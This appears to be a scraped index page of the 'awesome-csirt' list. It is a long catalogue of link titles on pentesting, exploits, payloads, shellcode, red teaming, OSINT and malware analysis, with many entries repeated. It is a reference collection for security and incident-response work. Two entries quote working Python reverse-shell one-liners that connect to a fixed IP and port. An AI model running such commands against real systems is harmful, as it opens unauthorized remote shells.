Ecosyste.ms: Awesome
An open API service indexing awesome lists of open source software.
awesome-csirt
Awesome CSIRT is a curated list of links and resources for security and CSIRT daily activities.
https://github.com/Spacial/awesome-csirt
Pentesting
ARM
- pentesting tool for finding vulnerabilities in web applications
- proxycannon-ng - Built by the community during a hackathon at the WWHF 2018 security conference
- IVRE
- Spawning a TTY Shell
- LeakLooker
- Order of the Overflow Proxy Service
- MarkBaggett’s gists
- Serverless Toolkit for Pentesters
- pentest_scripts
- DomainInformation - mail. Tries a zone transfer, searches for subdomains and finally checks for open ports on each subdomain IP. Enjoy =)
- postwoman - A free, fast, and beautiful alternative to Postman.
- liffy
- Linux for Pentester
- foxyproxy.json
- pown-recon
- Insecure Direct Object References (AUTHZ-004)
- Part 1
- Presentation Clickers
- Part 2
- Part 3
- Part 4
- DNS and DHCP Recon using Powershell
- SiteBroker - cross-platform Python-based utility for information gathering and penetration testing automation!
- Nikto: A Practical Website Vulnerability Scanner
- NetAss2
- CSS Injection Primitives
- physical-docs
- HACKING WITH ENVIRONMENT VARIABLES
- rootend
- DroneSploit
- HAck Tricks
- Huawei_Thief
- urldozer
- Pentesting Cheatsheets
- Snaffler
- Several ways to download and execute malicious codes (LOLBAS)
- coregen.exe
- Jok3r
- fiddler
- 21 - Pentesting FTP
- PwnWiki.io
- Proxyjump, the SSH option you probably never heard of
- GLORP - based HTTP intercept and replay proxy
- Sec4US's cheatsheets about shellcoding and buffer overflow.
- Pentesting 101: Working With Exploits
- SMB AutoRelay
- Decoder++
- SCShell
- A Noob Guide to setup your Own OOB DNS Server; [Out-of-Band DNS Bind Server](https://github.com/JuxhinDB/OOB-Server): A Bind9 server for pentesters to use for Out-of-Band vulnerabilities.
- DNSLOG
- Pre-engagement
- pentest, should I do it?
- White Box Penetration Testing: “Cheating” in order to boost impact and value
- Weird Proxies
- Penetration Testing Cheat Sheet
- BBT - Bug Bounty Tools
- Impacket
- bulwark
- From Python to .Net
- Penetration Testing - An Introduction
- Poor Man's Pentest
- Operator's Decalogue
- LOTS
- Filesec.io - stay up-to-date with the latest file extensions being used by attackers.
- EMBArk
- EMBA
- OffensiveNim
- Python Penetration Testing Cheat Sheet
- Install the Microsoft-signed Hybrid Connection Manager on a victim host, link it up with your Azure app, and enjoy persistent access to the on-prem network from your Azure portal.
- pwncat - injecting shell and port forwarding magic - and it's fully scriptable with Python (PSE)
- offensiveph
- osquery Across the Enterprise
- osquery
- Part 0
- Part 1
- Part 2
- Part 3
- Part 4
- Got Meterpreter? PivotPowPY!
- Pentest Tips and Tricks
- Script to steal passwords from ssh.
- Network Infrastructure Penetration Testing Tool
- "EAST" PENTEST FRAMEWORK
- DHCPwn
- trackerjacker
- TIDoS-Framework
- GitMiner
- badKarma
- Danger-zone
- go-tomcat-mgmt-scanner
- IoT Pentesting: [IoT-PT](https://github.com/IoT-PTv/IoT-PT): A Virtual environment for Pentesting IoT Devices
- red_team_telemetry
- DarkSpiritz
- Intrusion Detection
- Penetration Testing Tools Cheat Sheet
- IoTSecurity101
- PentestHardware
- PENTESTING-BIBLE
- Micro8 - test, network security enthusiasts, etc., enterprise security protection and improvement, the series complies with: Free, free, shared, open source.
- Penetration Test Guide based on the OWASP + Extra - TEST. I hope it will be useful in both penetration test projects and bug-bounty.
Exploits
- The Invoke-CradleCrafter Overview
- AllPocsFromHackerOne
- How I Found My First Ever ZeroDay (In RDP)
- SharpSelfDelete
- DVS - Lateral movement using DCOM Objects.
- Security Focus
- Exploit Files
- Exploits, Vulnerabilities and Payloads: Practical Introduction
- Beginners Guide to 0day/CVE AppSec Research
- Vulnerability DB
- mssqlproxy
- Traditional Buffer Overflow Windows cheatsheet
- Exploit writing tutorial part 3 : SEH Based Exploits
- Script to decode .vbe files
- Graphology of an Exploit
- The Exploit Database Git Repository
- Vulnerability Lab
- 0day.Today - The Underground, is one of the world's most popular and comprehensive computer security web sites.
- cxsecurity
- IOSurface exploit
- Attacking a co-hosted VM: A hacker, a hammer and two memory modules
- How To Create a Metasploit Module
- Installing Metasploit Pro, Ultimate, Express, and Community
- [unfurl - Based Link Vulnerability Analysis Tool](https://jlospinoso.github.io/python/unfurl/abrade/hacking/2018/02/08/unfurl-url-analysis.html)
- Sage ACF Blocks
- WebKit exploit
- A First Introduction to System Exploitation
- Python 2 vs 3 for Binary Exploitation Scripts
- DriveCrypt
- Faxploit
- NAVEX
- Three New DDE Obfuscation Methods
- fuxploider
- Jailbreaks Demystified
- Attacking Google Authenticator
- Introduction to ptmalloc2 internals (Part 1)
- ptmalloc2 internals (Part 2) - Fast Bins and First Fit Redirection
- UEFI vulnerabilities classification focused on BIOS implant delivery
- MikroTik Firewall & NAT Bypass
- 3D Accelerated Exploitation - The talk dealt with research into the VirtualBox 3D Acceleration feature, which is backed by a software component called Chromium.
- Beat the hole in the ATM
- RedGhost
- Z-Shave. Exploiting Z-Wave downgrade attacks
- Totally Pwning the Tapplock Smart Lock - Andrew Tierney 13 Jun 2018
- The Art of WebKit Exploitation
- PEASS
- Patchless AMSI bypass using SharpBlock
- Lets Create An EDR… And Bypass It! Part 1
- Lets Create An EDR… And Bypass It! Part 2
- SharpBlock
- Bypassing Antivirus with Golang – Gopher it!
- Modern Binary Exploitation - Spring 2015
- beebug
- GhostDelivery
- Sticky notes for pentesting.
- I found myself in need of a much shorter python reverse oneliner than shellpop provides by default. Here's what I landed on. 🙃 - c "import pty,socket;h,p='192.168.200.1',12345;socket.create_connection((h,p));pty.spawn('/bin/sh');"
- A collection of vulnerable ARM binaries for practicing exploit development
Payloads
- LaTex Injection
- CSV-Injection
- CSV Injection
- Directory Traversal
- Which Security Risks Do CORS Imply?
- Cross-Origin Resource Sharing (CORS)
- How to win at CORS
- SSRF Search & Destroy
- SSRF
- SSRF Tips
- Server Side Request Forgery on MISP (CVE-2020-28043)
- Exploiting JNDI Injections in Java
- MSFVenom Reverse Shell Payload Cheatsheet (with & without Meterpreter)
- MSFVenom - CheatSheet
- Creating Metasploit Payloads
- Shikata Ga Nai Encoder Still Going Strong
- BYPASSING ANTIVIRUS WITH MSFVENOM
- MSFVenom Cheatsheet
- Payload Delivery for DevOps - Platform Dropper Using the Genesis Framework, Metasploit and Docker. [code](https://github.com/gen0cide/gscript)
- Awesome one-liner bug bounty
- Dangerous Injections
- OAuth 2.0 Hacking Simplified — Part 2 — Vulnerabilities and Mitigation
- Handling Short Expiration Time of Authorization Tokens
- Reverse Shell Cheat Sheet
- Payloads Collection
- Command Injection Payload List
- Cross Site Scripting ( XSS ) Vulnerability Payload List
- XML External Entity (XXE) Injection Payload List
- RFI/LFI Payload List
- Open Redirect Payload List
- Creating Reverse Shell Payloads with MSFVenom
- Hiding Metasploit Shellcode to Evade Windows Defender
- Hiding malicious code with “Module Stomping”: Part 1
- PyFuscation
- Starting a handler with Metasploit
- System Calls
- bbrecon
- RPC Bug Hunting Case Studies – Part 1
- Top Penetration Testing & Bug Hunting YouTube Channels you should follow - Updated 11/19/2020
- Our top tips for better bug bounty reports, plus a hacker contest!
- KindleDrip
- Amazon Kindle Vulnerabilities Could Have Led Threat Actors to Device Control and Information Theft
- How I Might Have Hacked Any Microsoft Account
- BugBountyScanner
- alert() is dead, long live print()
- Bug Bounty Reconnaissance Framework
- If you do use BBRF, here is an initial script that uses the HackerOne API to gather all programs' scope, including your private programs.
- NotKeyHacks
- Two Rights Might Make A Wrong
- You always hear stories about how bug bounty programs steal your bug, but very few people post about it, or have the 100% proof to show this.
- OOB reads in network message handlers leads to RCE
- Bug Bounty Resources
- Google Bug Hunters
- 0-Day Hunting (Chaining Bugs/Methodology)
- KingOfBugBounty Project - known bug hunters. Using recon methodology, we are able to find subdomains, APIs, and tokens that are already exploitable, so we can report them. We wish to influence Onelinetips and explain the commands, for the better understanding of new hunters.
- Introducing CookieMonster
- get-title
- CRLF
- Insecure Direct Object References
- Crypto
- ParamSpider
- Server Side Request Forgery
- CRLF Injection
- crlf-injector
- CRLF Bruter
- Command Injection
- $4,000 Starbucks secondary context path traversal
- LFI
- fimap
- File Inclusion
- Open-Redirect
- RCE
- Template Injection
- SSTI
- XSLT
- Content Injection
- LDAP Injection
- NoSQL Injection
- ISCM
- OAuth
- XPATH Injection
- Bypass Upload Tricky
- Web Security CheatSheet
- Presenting The Pwning-Machine, a versatile and easy to setup Bug bounty environment.
- Zeus-Scanner - in URL parsing engine, multiple search engine compatibility, the ability to extract URLs from both ban and webcache URLs, the ability to run multiple vulnerability assessments on the target, and is able to bypass search engine captchas.
- SQL injection
- SQL Injection
- Blind SQL injection
- Blind SQL Injection at fasteditor.hema.com
- SQL Injection 101: How to Fingerprint Databases & Perform General Reconnaissance for a More Successful Attack
- SQL injection cheat sheet
- SQL Injection Cheat Sheet
- The Ultimate SQL Injection Cheat Sheet
- Examining the database in SQL injection attacks
- SQLi
- SleuthQL
- Postgres SQL Injection Cheat Sheet
- From SQL Injection to Shell: PostgreSQL edition
- Pentesting PostgreSQL with SQL Injections
- SQLite Injection
- Blind SQL Injection Detection and Exploitation (Cheat Sheet)
- sqlmap cheat sheets: 1 (sleuth.com/sleuth-blog/2017/1/3/sqlmap-cheat-sheet), [4](https://thedarksource.com/sqlmap-cheat-sheet/), [tamper scripts](https://gist.github.com/sapran/a12bd98cf212237ac9678d48f5152941)
- DNS Hijacking Attacks on Home Routers in Brazil
- CSRF Injection
- Bypassing CSRF tokens with Python’s CGIHTTPServer to exploit SQL injections
- Practical Attacks Using HTTP Request Smuggling
- HAProxy HTTP request smuggling (CVE-2019-18277)
- The Powerful HTTP Request Smuggling
- Smuggler
- HTTP.Request.Smuggling.Desync.Attack
- h2c Smuggling
- Advanced request smuggling
- Reflected XSS on www.hackerone.com via Wistia embed code
- Portable Data exFiltration: XSS for PDFs
- How to solve a challenge from Intigriti in under 60 minutes
- XSS Hunter - for finding cross-site scripting vulnerabilities, including the often-missed blind XSS. The service works by hosting specialized XSS probes which, upon firing, scan the page and send information about the vulnerable page to the XSS Hunter service. [xss hunter shortcut](http://xss.ht/)
- DalFox(Finder Of XSS) / Parameter Analysis and XSS Scanning tool based on golang
- Security impact of a misconfigured CORS implementation
- Dumping a complete database using SQL injection
- Cross-site scripting (XSS) cheat sheet
- xss cheatsheet
- an XSS payload, Cuneiform-alphabet based
- Find reflected parameters with Burp_Suite
- CORS'ing a Denial of Service via cache poisoning
- SSRF (Server Side Request Forgery) worth $4,913 | My Highest Bounty Ever !
- Unauthenticated Full-Read SSRF in Grafana (CVE-2020-13379)
- Server-Side Request Forgery using Javascript allows to exfill data from Google Metadata
- Blind SSRF Chains
- Out of Band XXE in an E-commerce IOS app
- Comprehensive Guide on XXE Injection
- XMLDecoder payload generator
- XXE
- SerialVersionUID in Java
- Gf-Patterns
- lorsrf
- dtd-finder
- New XML technique! Encode any DTD/XML inside an internal entity, and fly under WAF radars!
- XXE_payloads
- Advanced XXE Exploitation
- ysoserial - proof-of-concept tool for generating payloads that exploit unsafe Java object deserialization.
- Java Serialization Magic Methods And Their Uses With Example
- Apache Tomcat Deserialization of Untrusted Data RCE (CVE-2020-9484) - java/org/apache/naming/factory/BeanFactory.java - good to use for JRMI abuse
- CVE-2020-9484-Mass-Scan
- How to exploit Liferay CVE-2020-7961 : quick journey to PoC
- How I Hacked Facebook Again! Unauthenticated RCE on MobileIron MDM
- Serialization: the big threat
- Fear of the Unknown: A Metanalysis of Insecure Object Deserialization Vulnerabilities
- Deserialization
- FAR SIDES OF JAVA REMOTE PROTOCOLS
- Serialization and deserialization in Java: explaining the Java deserialize vulnerability
- Orange: How I Chained 4 vulnerabilities on GitHub Enterprise, From SSRF Execution Chain to RCE!
- code white | Blog: Liferay Portal JSON Web Service RCE Vulnerabilities
- How to Insomnia for GraphQL requests
- InQL Scanner
- Debugging your GraphQL server was never this easy!
- GraphQL Voyager
- pbtk - Reverse engineering Protobuf-based apps.
- Online Protobuf Decoder.
- LazySSTICheck
- CSM_Pocs - class security management application that provides insight into and control of Cisco security and network devices.
- DSSS
- Garud - domains, sub-domain takeover and then filters out xss, ssti, ssrf and more injection point parameters.
- waybackurls
- Easily Identify Malicious Servers on the Internet with JARM
- Turbo Search
- Coordinated disclosure of XML round-trip vulnerabilities in Go’s standard library
- JWT Vulnerabilities (Json Web Tokens)
- marshalsec
- SerializationDumper
- owaspsd-deserialize-my-shorts
- Testing and exploiting Java Deserialization in 2021
- GraphQL - [graphql](https://github.com/APIs-guru/graphql-voyager): Represent any GraphQL API as an interactive graph.
- GraphQL security 101
- Queries and Mutations
- GraphQL Injection
- ProtoFuzz
- Hacking Starbucks and Accessing Nearly 100 Million Customer Records
- Attacking Secondary Contexts in Web Applications
- Fugu API Tracker - cross-company effort to make it possible for web apps to do anything iOS, Android, or desktop apps can, by exposing the capabilities of these platforms to the web while maintaining user security, privacy, trust, and other core tenets of the web.
- XS-Leaks - Cross-site leaks (aka XS-Leaks, XSLeaks) are a class of vulnerabilities derived from side-channels built into the web platform. They take advantage of the web's core principle of composability, which allows websites to interact with each other, and abuse legitimate mechanisms to infer information about the user. One way of looking at XS-Leaks is to highlight their similarity with cross-site request forgery (CSRF) techniques, with the main difference being that instead of allowing other websites to perform actions on behalf of a user, XS-Leaks can be used to infer information about a user.
- Chrome extension to detect possible xsleaks
- Web Finder
- Flask Unsign - brute-force and craft session cookies of a Flask application by guessing secret keys.
- jwt-pwn
- Burp Suite Cheat Sheet
- Part 1 – Introduction & Configuration
- Part 3 – Reporting
- Deploying a private Burp Collaborator server
- Burp Collaborator Server docker container with LetsEncrypt certificate
- Part 2 – Testing
- privatecollaborator
- SELF-HOSTED BURP COLLABORATOR FOR FUN AND PROFIT
- AES-Killer v3.0
- Howto install and use the Burp Suite as HTTPS Proxy on Ubuntu 14.04
- BurpExtension-WhatsApp-Decryption-CheckPoint
- param-miner
- PII-Identifier
- API testing with Swurg for Burp Suite
- create a Passive Profile for a param value, like *testsqli* and then create a Rule with this Profile to trigger SQLi active profile.
- BurpSuite-Team-Extension
- ActiveScan++
- IDOR
- OAuth 2.0 Hacking Simplified — Part 2 — Vulnerabilities and Mitigation
- Handling Short Expiration Time of Authorization Tokens
- Payload Delivery for DevOps - Platform Dropper Using the Genesis Framework, Metasploit and Docker. [code](https://github.com/gen0cide/gscript)
- Awesome one-liner bug bounty
- get-title
- CSV Injection
- Content Injection
- XPATH Injection
- SQL injection
- Blind SQL injection
- Dangerous Injections
- The Ultimate SQL Injection Cheat Sheet
- Blind SQL Injection Detection and Exploitation (Cheat Sheet)
- Portable Data exFiltration: XSS for PDFs - data-exfiltration)
- XSS Hunter - site scripting vulnerabilities, including the often-missed blind XSS. The service works by hosting specialized XSS probes which, upon firing, scan the page and send information about the vulnerable page to the XSS Hunter service. [xss hunter shortcut](http://xss.ht/)
- CORS'ing a Denial of Service via cache poisoning
- Server-Side Request Forgery using Javascript allows to exfill data from Google Metadata
- Blind SSRF Chains
- Java Serialization Magic Methods And Their Uses With Example
- CSM_Pocs - class security management application that provides insight into and control of Cisco security and network devices.
- JWT Vulnerabilities (Json Web Tokens)
- Attacking Secondary Contexts in Web Applications
- OAuth 2.0 Hacking Simplified — Part 2 — Vulnerabilities and Mitigation
- SELF-HOSTED BURP COLLABORATOR FOR FUN AND PROFIT - vulnerabilities and exfiltrate data.
- AES-Killer v3.0
- Handling Short Expiration Time of Authorization Tokens
- Payload Delivery for DevOps - Platform Dropper Using the Genesis Framework, Metasploit and Docker. [code](https://github.com/gen0cide/gscript)
- Awesome one-liner bug bounty
- Dangerous Injections
- Payload Delivery for DevOps - Platform Dropper Using the Genesis Framework, Metasploit and Docker. [code](https://github.com/gen0cide/gscript)
- Awesome one-liner bug bounty
- Dangerous Injections
- OAuth 2.0 Hacking Simplified — Part 2 — Vulnerabilities and Mitigation
- Handling Short Expiration Time of Authorization Tokens
- Shikata Ga Nai Encoder Still Going Strong
- Hiding malicious code with “Module Stomping”: Part 1
- RPC Bug Hunting Case Studies – Part 1
- HRS - HTTP Request Smuggling Attack. What, Why and How.
- Enjoying my first blind xxe experience
- GraphQL - voyager/) [graphql](https://github.com/APIs-guru/graphql-voyager):  Represent any GraphQL API as an interactive graph.
- Coordinated disclosure of XML round-trip vulnerabilities in Go’s standard library
- XS-Leaks - site leaks (aka XS-Leaks, XSLeaks) are a class of vulnerabilities derived from side-channels built into the web platform. They take advantage of the web’s core principle of composability, which allows websites to interact with each other, and abuse legitimate mechanisms to infer information about the user. One way of looking at XS-Leaks is to highlight their similarity with cross-site request forgery (CSRF) techniques, with the main difference being that instead of allowing other websites to perform actions on behalf of a user, XS-Leaks can be used to infer information about a user.
- Planilhas Baby
- An investigation into SQL Injection tools — The pattern of each attack tool Part II
- Advanced SQL Injection
- Breaking Protocol (Buffers): Reverse Engineering gRPC Binaries
- MSFVenom - CheatSheet
- Dumping a complete database using SQL injection
- kadimus
- DNS Hijacking Attacks on Home Routers in Brazil
- Debugging your GraphQL server was never this easy!
-
Reconnaissance
- Automated Reconnaissance Pipeline
- PERFORMING DOMAIN RECONNAISSANCE USING POWERSHELL
- URLBrute
- degoogle - through links and other sketchiness.
- Investigator - recon tool.
-
Enumeration
- linux-smart-enumeration
- Ethical Hacking Course: Enumeration Theory
- massh-enum
- subscraper
- Social Mapper - A Social Media Enumeration & Correlation Tool. [github repo](https://github.com/SpiderLabs/social_mapper)
- social_mapper
- WPExploitation
- linpostexp
- LEGION - Automatic Enumeration Tool
- discover - Custom bash scripts used to automate various penetration testing tasks including recon, scanning, parsing, and creating malicious payloads and listeners with Metasploit.
- CTFR - force, it just abuses Certificate Transparency logs.
- grinder - end systems (Shodan, Censys)
- Admin-Scanner
- Virtual host scanner
- vhost-brute
- grab_beacon_config
- assetfinder
- hackerone_wordlist
- paths wordlists
- subdomains wordlists
- parameters wordlists
- How to Roll a Strong Password with 20-Sided Dice and Fandom-Inspired Wordlists
- Assetnote Wordlists
- Weakpass - based online generator to create a wordlist based on a set of words entered by the user. [Kraker](https://github.com/zzzteph/kraker) is a distributed password brute-force system that is focused on ease of use.
- Default IoT Username/password
- Elpscrk
- SuperEnum
- Domain Dossier
- X41 BeanStack
- Skanuvaty
- OS Fingerprinting using NTP
-
WebShells
-
ShellCodes
- Why is My Perfectly Good Shellcode Not Working?
- shellcode2asmjs - Spray payloads
- C-S1lentProcess1njector
- pe_to_shellcode
- stager.dll - metasploit-shellcode-to-evade-windows-defender/)
- ThreadBoat
- Excel4-DCOM
- MaliciousMacroMSBuild
- Linux x86 Reverse Shell Shellcode
- mem-loader.asm - memory using an anonymous file descriptor (inspired by [x-c3ll](https://x-c3ll.github.io/posts/fileless-memfd_create/))
- Shellab
- ShellcodeWrapper
- Fully (auto) interactive TTY shells
- I saw a python reverse shell, thought it looked a little long (215 chars), so I came up with my own! (107/98 ch) - lnvp 1234 / python3 -c "# 107, single statement, non-blocking __import__("subprocess").Popen("sh",0,None,*[ __import__("socket").create_connection(("127.0.0.1",1234))]*3)" or "# 98, separators, blocking import subprocess as S,socket; S.run("sh",0,None,*[ socket.create_connection(("127.0.0.1",1234))]*3)"
- python-pty-shells - full PTY or nothing!
- Powershell HTTP/S Reverse Shell
- HTTP/S Asynchronous Reverse Shell
- powershell reverse shell one-liner
- Reverse Shell Cheat Sheet
- Reverse Shell Generator - shell-generator)
- How to Execute Shell Commands with Python
- Reverse Shell to fully interactive
- Single-Line Web Shell
- Simple-Backdoor-One-Liner.php
- reverse shell
- Spawning reverse shells
- Spawning interactive reverse shells with TTY
- shellver
- Using tmux for automating interactive reverse shells
- USING A C# SHELLCODE RUNNER AND CONFUSEREX TO BYPASS UAC WHILE EVADING AV
- New XML technique! Encode any DTD/XML inside an internal entity, and fly under WAF radars!
- Using pwntools for Binary Exploitation
- vba-obfuscator - PoC of malware code obfuscation in Word macros
- ProcessInjection
- shellcoding using env variables
- From a C project, through assembly, to shellcode
- SnapLoader
- CallObfuscator
- Writing and Compiling Shellcode in C
- Using ICMP to deliver shellcode
- Buffer Overflow Windows - EGGHUNTER cheatsheet
- metasploit, x86/alpha_mixed and Windows 7 are killing me
- Some lessons learned along the way to Buffer Overflow
- Windows 10 Exploit Development Setup - Vulnserver Walkthrough Part 1
- Resolving API addresses in memory
- Locating Kernel32 Base Address
- Finding Kernel32 Base and Function Addresses in Shellcode
- Basics of Windows shellcode writing
- Shellcodes database for study cases
- Return Oriented Programming (ROP) Attacks
- ROPgadget Tool
- ROP Gadget Prevalence and Survival under Compiler-based Binary Diversification Schemes
- one_gadget
- JOP ROCKET - oriented Programming Reversing Open Cyber Knowledge Expert Tool, or JOP ROCKET, is a tool designed to help facilitate JOP gadget discovery in an x86 Windows environment.
- A fun trick for running shellcode directly from bash
- Polyglot Assembly
- Shellcode Injection Techniques
- Simple Shellcode Tale! - Fault-ao-executar-o-shellcode-1341182f023846ec9ad4da5b1729f7aa)
- Linux x86 execve("/bin/sh") - 28 bytes
- Windows/x86 Dynamic Bind Shell / Null-Free Shellcode
- Core
- ShellCode Tester
- Ninja UUID Shellcode Runner
- IPFuscator
- Shellcode Mutator - instruction sets (such as nops) to avoid signatures.
- Ten process injection techniques: A technical survey of common and trending process injection techniques
-
Reporting
- TryHackMe. Breaking Into the Kenobi Machine.
- This is how you can deliver true value through your pentest reports
- Technical Report template
- report-ng - based reports with HP WebInspect / Burp Suite Pro input, own custom data and knowledge base.
- PandocPentestReport
- PwnDoc
-
OSINT - Open Source INTelligence
- Slides from my ShellCon Talk, OSINT for Pen Tests, given 10/19.
- OSINT tool for visualizing relationships between domains, IPs and email addresses.
- iKy
- OSint Tools
- the-endorser
- OSINT-y Goodness
- OSINT Resources for 2019
- Directory of Open Access Journals
- Identifying A Pro-Indonesian Propaganda Bot Network
- Breaking Mimblewimble’s Privacy Model
- snscrape
- ꓘamerka GUI - ciech/Kamerka-GUI). ICS/IoT search: [ꓘamerka](https://woj-ciech.github.io/kamerka-demo/kamerka.html). [Kamerka OSINT tool shows your country's internet-connected critical infrastructure](https://www.zdnet.com/article/kamerka-osint-tool-shows-your-countrys-internet-connected-critical-infrastructure/)
- dmi-tcat - Twitter Capture and Analysis Toolset.
- KnockKnock
- From email to phone number, a new OSINT approach
- recox
- openSquat
- sifter
- Kitsune
- Image "Cloaking" for Personal Privacy - usenix20.pdf)
- usufy
- osrf
- IntelMQ - suite solution for IT security teams (CERTs & CSIRTs, SOCs abuse departments, etc.) for collecting and processing security feeds using a message queuing protocol. Its main goal is to give to incident responders an easy way to collect & process threat intelligence thus improving the incident handling processes of CERTs.
- OSINT SAN Framework. - SAN Framework makes it possible to quickly find information and de-anonymize Internet users. The software is a framework that contains 30 functions for searching information or de-anonymizing users. With the help of my software, you can collect information about users on the Internet, anonymously and without special skills.
- Scrummage
- viper
- karma v2
- 3WiFi
- Stealth plane in flight
- ExportData - Twitter data export tool. Allows downloading historical tweets since 2006, exporting followers & followings and collects historical trends in 467 locations.
- DetectDee
- OSINT framework
- ODBParser
- pastego
- Instagram Scraper
- galer - in.
- How to bypass CloudFlare bot protection?
- SpyScrap
- dorking
- Complete Google Dorks List in 2020 For Ethical Hacking and Penetration Testing
- The closer a username/email address resembles other username/email addresses associated w/ a target, the easier it is to find (or guess &/or 'bruteforce') other usernames/email addresses associated w/ that target.
- DorkGenius
- chatter
- ail-feeder-telegram
- MODIFYING TELEGRAM'S "PEOPLE NEARBY" FEATURE TO PINPOINT PEOPLE'S HOMES
- WhatsMyName
- Maltego Transforms for WhatsMyName
- shadowbanned - eu/shadowban-eu-frontend)
- signald
- Telegram messenger CLI - cli` for Telegram IM.
- TelegramScraper - /disinformation and investigating shady goings-on.
- OSINT-Discord-resources
- OSINT – Passive Recon and Discovery of Assets
- OSINT – LinkedIn is Not Just for Jobs
-
Vulnerability
- Beating the OWASP Benchmark
- Striker
- SQL Vulnerability Scanner
- Decentralized Application Security Project
- Introduction to IDAPython for Vulnerability Hunting — Somerset Recon
- CMSScan
- Meteor Blind NoSQL Injection
- Testing docker CVE scanners. Part 2.5 — Exploiting CVE scanners - scanner-exploiting-pocs)
- New NAT/Firewall Bypass Attack Lets Hackers Access Any TCP/UDP Service
- HellRaiser
- Open-Source Vulnerability Intelligence Center - Vulnerability Intelligence Center / Exploits
- Vagrant GVM/Openvas
- How to Have a Cybersecurity Graph Database on Your PC
- On the Security Vulnerabilities of Text-to-SQL Models
- Security Bulletins that relate to Netflix Open Source
-
WAFs
- Web Application Penetration Testing Course URLs
- Web Application Penetration Testing Notes
- quarantyne
- Sitadel
- WAF through the eyes of hackers
- Some nice payloads to bypass XSS WAF
- bypassing modern web application firewalls
- Bypassing Cloudflare WAF with the origin server IP address
- WAF-Hook
- Behindflare tool
- Wordpress technique
- A Scientific Notation Bug in MySQL left AWS WAF Clients Vulnerable to SQL Injection
- Some MySQL tricks to break some #WAFs out there.
- another one
-
Red Team
- Machine Learning for Red Teams, Part 1
- Flying under the radar
- demiguise
- jenkins-shell
- How Do I Prepare to Join a Red Team?
- Red Team & Physical Entry Gear
- Gaining access on an external engagement through spear-phishing
- Phantom Tap (PhanTap)
- So You Want to Run a Red Team Operation
- Alternative C2 for Red Teamers - JScript RAT
- tuning tip
- In-Memory-Only ELF Execution (Without tmpfs)
- A Red Teamer's guide to pivoting
- FIN6 Adversary Emulation
- RedFile
- Choose Your Own Red Team Adventure
- Red Team Tactics: Hiding Windows Services
- AQUARMOURY
- Prelude Operator
- 0xsp Mongoose Red for Windows
- Macrome
- wifipumpkin3
- redcanaryco/AtomicTestHarnesses: Public Repo for Atomic Test Harness
- pivoting cheat sheet
- Self-hosting Your Red Team Payloads - deployable file hosting service for red teamers, allowing to easily upload and share payloads over HTTP and WebDAV.
- Boomerang
- Mythic - platform, red teaming framework.
- Bypassing User-Mode Hooks and Direct Invocation of System Calls for Red Teams
- Red Teaming/Adversary Simulation Toolkit
- Red Team development and operations
- VECTR
- Mortar Loader
- RedTeam-Tools
- Cobalt Strike - strike-4-2-everything-but-the-kitchen-sink/)
- CrossC2 - platform payload
- Cobalt-Strike-CheatSheet
- Introducing - strike.github.io/community_kit/)
- Octopus - operation C2 server based on python and powershell [Cobalt Strike Community Kit](https://cobalt-strike.github.io/community_kit/)
- Building C2 Implants in C++: A Primer
- tc2
- ToRat
- Python Backdoor Talking to a C2 Through Ngrok
- Cobalt Strike Beacon Injected into werfault.exe
- pyMalleableC2
- THIRD STEP IN SETTING UP C2 ENVIRONMENT. USING SOCAT AS FRONT TO MERLIN. COMMAND AND CONTROL MY WAY.
- Detecting CONTI CobaltStrike Lateral Movement Techniques - Part 2
- melting-cobalt
- Beacon generation for iOS attacks
- PoshC2 - C2 framework for post-exploitation and lateral movement. [Native macOS Implants](https://labs.nettitude.com/blog/poshc2-introducing-native-macos-implants/)
- link
- Machine Learning for Red Teams, Part 1
- Red Tip #415 - r domain.fqdn -U username” to change the password so you can use the account.
- Cobalt Strike: Using Known Private Keys To Decrypt Traffic – Part 1
- The-Hacker-Playbook-3-Translation
-
Purple Team
-
-
Malware Analysis
- Unprotect
- Awesome Malware Analysis
- course
- CS6038/CS5138 Malware Analysis, UC
- list
- IKARUS anti.virus and its 9 exploitable kernel vulnerabilities
- Digital Certificates Used by Malware
- Signed Malware – The Dataset
- Malware Sample Sources for Researchers
- Indicators: Champing at the Cyberbit
- binary ninja
- OSX/MaMi
- mal100.evad.spre.rans.spyw.troj.winEXE@34/9@31/10
- Chaos: a Stolen Backdoor Rising Again
- Cuckoo Sandbox
- EternalGlue part two: A rebuilt NotPetya gets its first execution outside of the lab
- Forgot About Default Accounts? No Worries, GoScanSSH Didn’t
- TESSERACT: Eliminating Experimental Bias in Malware Classification across Space and Time
- colental/byob: BYOB (Build Your Own Botnet)
- Source Code for Exobot Android Banking Trojan Leaked Online
- Ramnit’s Network of Proxy Servers
- A malware analysis kit for the novice
- When a malware is more complex than the paper.
- Gh0st
- What you need to know about “LoJax”—the new, stealthy malware from Fancy Bear
- PHP Malware Examination
- Analysis of Linux.Haikai
- Cylance vs. MBRKiller Wiper Malware
- Deep Analysis of TrickBot New Module pwgrab
- Mac malware combines EmPyre backdoor and XMRig miner
- The Full Guide Understanding Fileless Malware Infections
- 'Injection' Without Injection
- Analysis of Neutrino Bot Sample: In this post I analyze a Neutrino Bot sample.
- Thunderstrike2 details
- Malboxes
- Triton is the world’s most murderous malware, and it’s spreading
- Cloak and Dagger — Mobile Malware Techniques Demystified
- Welcome to the Dark Side: Part 1
- Welcome to the Dark Side: Part 2-1
- Welcome to the Dark Side: Part 2-2
- Welcome to the Dark Side: Part 3
- Welcome to the Dark Side: Part 4
- Command and Control via TCP Handshake
- wdeQEksXgm
- emotet malware IoCs (09-18-19)
- Anti-VM Technique with MSAcpi_ThermalZoneTemperature
- AMSI as a Service - makes file-less malware visible to AV engines.
- CAPA - open-source tool to identify capabilities in executable files. [capa-rules](https://github.com/fireeye/capa-rules)
- FRITZFROG - A NEW GENERATION OF PEER-TO-PEER BOTNETS. [detection script](https://github.com/guardicore/labs_campaigns/tree/master/FritzFrog)
- malware analysis and machine learning
- GhostDNSbusters
- The Tetrade
- Is macOS under the biggest malware attack ever?
- Hybrid Analysis
- Part 1: The Black-Box Approach
- ember
- The Art Of Mac Malware: Analysis
- Sandbox detection and evasion techniques. How malware has evolved over the last 10 years
- Go Assembly on the arm64
- Exploit Kit still sharpens a sword
- Pingback
- WinAPI-Tricks
- Cuckoo Sandbox Overview
- Malvuln
- Machine Learning for Static Malware Analysis, with University College London
- Vigilante malware rats out software pirates while blocking ThePirateBay
- Necro Python bot adds new exploits and Tezos mining to its bag of tricks
- Made in China: OSX.ZuRu
- DBatLoader: Abusing Discord to Deliver Warzone RAT
- Siloscape
- DRIDEX
